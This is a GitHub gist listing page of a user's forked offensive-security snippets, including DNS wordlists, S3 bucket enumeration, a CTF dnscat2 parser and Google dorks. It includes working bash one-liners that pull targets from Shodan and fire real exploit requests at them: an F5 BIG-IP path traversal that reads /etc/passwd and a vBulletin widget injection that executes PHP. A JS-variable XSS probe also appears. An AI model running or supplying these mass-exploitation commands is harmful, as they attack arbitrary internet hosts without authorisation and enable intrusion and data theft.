Skip to content

Instantly share code, notes, and snippets.

View ipk1's full-sized avatar

ipk1 ipk1

12 followers · 34 following
View GitHub Profile
@ipk1
ipk1 / bsidessf_ctf_dnscat2.py
Created March 22, 2021 14:20 — forked from xpn/bsidessf_ctf_dnscat2.py
from scapy.all import *
from scapy.utils import rdpcap
import sys
import struct
from pwn import *
MESSAGE_TYPE_SYN = 0x00
MESSAGE_TYPE_MSG = 0x1
MESSAGE_TYPE_PING = 0xFF
@ipk1
ipk1 / all.txt
Created November 30, 2020 20:39 — forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
.
..
........
@
*
*.*
*.*.*
🐎
0
@ipk1
ipk1 / rce.sh
Created November 28, 2020 11:51 — forked from Mad-robot/rce.sh
Shodan Big Ip RCE
shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done
#sudo apt install curl
#sudo apt install python3-shodan
#shodan init YOUR_API_KEY
@ipk1
ipk1 / vBulletin RCE shodan
Created November 28, 2020 11:51 — forked from Mad-robot/vBulletin RCE shodan
shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done;
@ipk1
ipk1 / find js file one liner
Created September 2, 2020 17:55 — forked from Spy0x7/find js file one liner
assetfinder site.com | gau|egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)'|while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Zo-9_]+" |sed -e 's, 'var','"$url"?',g' -e 's/ //g'|grep -v '.js'|sed 's/.*/&=xss/g'):echo -e "\e[1;33m$url\n" "\e[1;32m$vars";done
@ipk1
ipk1 / autoffuf.sh
Created August 28, 2020 11:51 — forked from ZoczuS/autoffuf.sh
#!/bin/bash
#
# Usage: ./autoffuf.sh http://example.com
#
# (C) Jakub Żoczek
# https://twitter.com/zoczus
#####
url=$1
wordlist="/opt/common.txt"
@ipk1
ipk1 / gist:c00af252b938f57b4904fefa8293c054
Created August 28, 2020 11:51 — forked from the-xentropy/gist:05ab1c5efd7ae7651b14e0fb85c6312c
Use wfuzz or ffuf to enumerate s3
Ffuf (faster):
ffuf -u "https://s3.REGION.amazonaws.com/COMPANYDELIMITERENVIRONMENT" -w "aws-regions.txt:REGION" -w "company.txt:COMPANY" -w "delimiters.txt:DELIMITER" -w "/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:ENVIRONMENT" -mc 200 -v
Wfuzz:
wfuzz -u "https://s3.FUZZ.amazonaws.com/FUZ2ZFUZ3ZFUZ4Z" -w aws-regions.txt -w company.txt -w delimiters.txt -w "/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt" --sc 200 -v -t 50
The files:
@ipk1
ipk1 / google-dorks
Created August 26, 2020 15:52 — forked from dwisiswant0/google-dorks
Listing of a number of useful Google dorks.
" _ _ "
" _ /|| . . ||\ _ "
" ( } \||D ' ' ' C||/ { % "
" | /\__,=_[_] ' . . ' [_]_=,__/\ |"
" |_\_ |----| |----| _/_|"
" | |/ | | | | \| |"
" | /_ | | | | _\ |"
It is all fun and games until someone gets hacked!